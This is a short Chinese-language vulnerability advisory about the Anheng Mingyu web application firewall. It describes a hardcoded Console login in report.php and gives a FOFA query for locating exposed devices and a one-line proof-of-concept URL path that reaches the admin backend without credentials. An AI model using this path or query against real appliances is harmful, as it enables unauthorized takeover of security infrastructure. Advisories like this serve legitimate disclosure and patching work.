Nx01 产品简介
安恒明御WEB应用防火墙(简称WAF)是杭州安恒信息技术股份有限公司自主研发的一款专业应用安全防护产品,专注于为网站、APP等Web业务系统提供安全防护。
Nx02 漏洞描述
安恒明御WEB应用防火墙report.php文件存在硬编码设置的Console用户登录,攻击者可以通过漏洞直接登录后台。
Nx03 产品主页
fofa-query: app="安恒信息-明御WAF"
Nx04 漏洞复现
POC:
/report.m?a=rpc-timed
返回主页面后即可登录后台。
Nx05 修复建议
建议联系软件厂商进行处理。
